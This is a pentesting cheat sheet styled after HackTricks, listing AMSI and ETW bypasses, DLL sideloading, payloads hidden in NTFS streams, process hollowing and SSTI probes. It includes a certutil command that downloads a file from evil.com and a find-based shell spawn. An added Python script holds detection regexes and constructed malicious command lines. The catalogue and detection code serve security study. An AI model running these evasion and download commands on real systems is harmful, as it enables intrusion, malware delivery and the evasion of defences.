Below is a concise, structured, and actionable compilation of 179 practical offensive-security techniques, tools, and workflows inspired by common pentesting references and aggregated best practices. Each entry includes a short description, when to use it, and concise actionable steps or commands. Use responsibly and only on systems you own or are authorized to test.
HackTricks — Top 179 Techniques (detailed guide)

- Tunneling via HTTPS (stunnel, nginx reverse proxy): wrap a C2 or SSH channel in TLS on 443 so it blends with ordinary web traffic.
- Hardware implant concepts (COTS implants): off-the-shelf devices such as keystroke injectors or inline network taps placed with physical access.
- Verify whether the organization uses RPKI (route origin validation) to limit prefix hijacking.
- SSTI detection: try `{{7*7}}`, `${7*7}`, and the equivalent payloads for Jinja, Twig, etc., and look for `49` in the response.
| # | Trick | Description |
|---|-------|-------------|
| 141 | AMSI bypass (PowerShell) | `[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)` flips the private "init failed" flag so AMSI stops scanning the current session. The literal string is itself signatured, so in practice it needs obfuscation (string splitting, reflection by index). |
| 142 | ETW bypass | Patch `ntdll!EtwEventWrite` (or the underlying `NtTraceEvent` syscall) in the current process to return immediately, so .NET and PowerShell telemetry is never emitted; issuing syscalls directly (e.g. `NtCreateThreadEx` for injection) sidesteps user-mode hooks but is not itself an ETW bypass. |
| 143 | DLL sideloading | Drop a malicious `version.dll` next to a signed application that loads it by name from its own directory (DLL search order); forward the real exports so the application keeps working. |
| 144 | Alternate data streams | `type payload.exe > legit.txt:payload.exe` stores the payload in an NTFS stream invisible to plain `dir`; `dir /r` or `Get-Item legit.txt -Stream *` lists streams. |
| 145 | LOLBAS (living off the land) | `certutil -urlcache -f http://evil.com/file.exe file.exe` downloads with a Microsoft-signed binary; the catalogue at lolbas-project.github.io lists other binaries with download, execute, or decode primitives. |
| 146 | GTFOBins for *nix | `find . -exec /bin/sh \; -quit` spawns a shell; if `find` is SUID or allowed via sudo the shell is privileged. See gtfobins.github.io for the full list. |
| ... | ... | ... |
| 160 | Process hollowing | `CreateProcess` with `CREATE_SUSPENDED`, `NtUnmapViewOfSection` on the original image, `WriteProcessMemory` the payload PE into the process, `SetThreadContext` to point at the new entry point, then `ResumeThread`. |
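The tricks in the table above leave recognisable traces in process-creation telemetry. The following is an added example (not part of the original guide) that runs a few string/regex rules for entries 141, 144, 145 and 146 over constructed command lines; the rule names, the sample command lines and the 198.51.100.7 address are all made up for this illustration.

```python
"""Constructed process-creation command lines checked against simple rules for
the AMSI-bypass one-liner, certutil downloads, ADS writes and the GTFOBins
find shell. Editor's example; not code from the original page."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str            # hypothetical rule name, chosen for this example
    pattern: re.Pattern  # compiled regex run against the raw command line


RULES = [
    # Trick 141: reflection against AmsiUtils / amsiInitFailed (string-based,
    # so string-splitting obfuscation evades it; see note below).
    Rule("amsi_bypass_reflection",
         re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I)),
    # Trick 145: certutil used as a downloader.
    Rule("certutil_download",
         re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache", re.I)),
    # Trick 144: redirection into file:stream. The optional drive-letter group
    # keeps "C:\path\out.txt" from matching on its own colon.
    Rule("ads_write",
         re.compile(r">\s*(?:[A-Za-z]:)?[^\s:]+:(?![\\/])[^\s:]+")),
    # Trick 146: find -exec spawning a shell.
    Rule("gtfobins_find_shell",
         re.compile(r"\bfind\b.*-exec\s+/bin/(?:ba)?sh\b")),
]

# Constructed sample telemetry: four malicious lines, then two benign ones.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -c \"[Ref].Assembly.GetType("
    "'System.Management.Automation.AmsiUtils').GetField('amsiInitFailed',"
    "'NonPublic,Static').SetValue($null,$true)\"",
    "certutil.exe -urlcache -f http://198.51.100.7/file.exe C:\\Users\\Public\\file.exe",
    "cmd.exe /c type payload.exe > C:\\Users\\Public\\legit.txt:payload.exe",
    "find . -exec /bin/sh \\; -quit",
    "certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256",
    "cmd.exe /c type report.txt > C:\\Users\\Public\\out.txt",
]


def matched_rules(command_line: str) -> list[str]:
    """Names of every rule whose pattern matches the command line, in rule order."""
    return [r.name for r in RULES if r.pattern.search(command_line)]


def scan(command_lines: list[str]) -> list[tuple[str, str]]:
    """(rule name, command line) pairs for every hit across the input."""
    return [(name, line) for line in command_lines for name in matched_rules(line)]


if __name__ == "__main__":
    for name, line in scan(SAMPLE_COMMAND_LINES):
        print(f"{name:24s} {line[:70]}")
```

The AMSI rule illustrates the limit of string matching: the same bypass written as `'Amsi'+'Utils'` or resolved by enumerating types produces no hit, which is exactly why the trick needs obfuscation to work and why AMSI-related detection is better done on the patched flag or on `AmsiScanBuffer` integrity than on command-line text.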
Route leak: incorrect routing information (BGP announcements) is propagated beyond its intended scope, usually through misconfiguration rather than malice; RPKI origin validation does not stop leaks of validly originated prefixes, so prefix filtering on peer and customer sessions is still required.